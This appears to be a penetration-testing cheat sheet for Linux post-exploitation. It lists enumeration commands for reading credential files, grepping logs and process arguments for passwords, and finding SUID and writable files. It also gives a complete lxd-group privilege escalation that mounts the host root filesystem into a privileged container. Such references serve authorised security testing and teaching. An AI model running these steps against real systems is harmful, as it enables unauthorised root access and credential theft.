Post Exploit Checks

General Enumeration

  • Know if the environment is a real host
ls -la / # check if the root dir has .[dot] files we can know if its a docker env
  • Know the permissions of the user
sudo -l
  • Know the users
cat /etc/passwd
  • Check for .htaccess file
  • /etc/apache2/sites-enabled/*
  • /etc/nginx/nginx.conf
  • /etc/ssh/sshd_config
  • Application Specific Configs : wp-config, settings.php etc..,

Groups Exploitation


  • The adm group members can view the log files
cd /var/log
grep -EnRi password .


  • The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment
# attacker machine
git clone
cd lxd-alpine-builder
# victim machine
lxd init # yes to all
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine

Files Enumeration

  • Find suid binaries
find / -perm /4000 -ls 2>/dev/null
  • Find Writeable files
find / -type f -writable 2>/dev/null | grep -v proc
  • Find files owned by the user (group specific)
# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
  • Locations to check
ls /opt
ls /usr/local/bin
ls ~/.local/bin

Background Jobs Enumeration

  • Crontabs
crontab -l
cat /etc/crontab
  • Enumerate processes with pspy

Network Enumeration

  • Know the network adapters ( might be communicating internally )
ip a
  • Open Ports and services
netstat -antp
# look for unusal services running interally or mysql service

Process Enumeration

  • Enumerate the services that are running
ps aux
  • Get more information about the process (like the passed arguments etc.., it might contain passwords )
# know the process id from ps aux
cat /proc/<processid>/cmd

Web Directories

  • Check the web directories for passwords


# Connecting to mysql
mysql -u root -p
# password prompt
mysql> select * from wp_users \G # instead of "select * from wp_users;"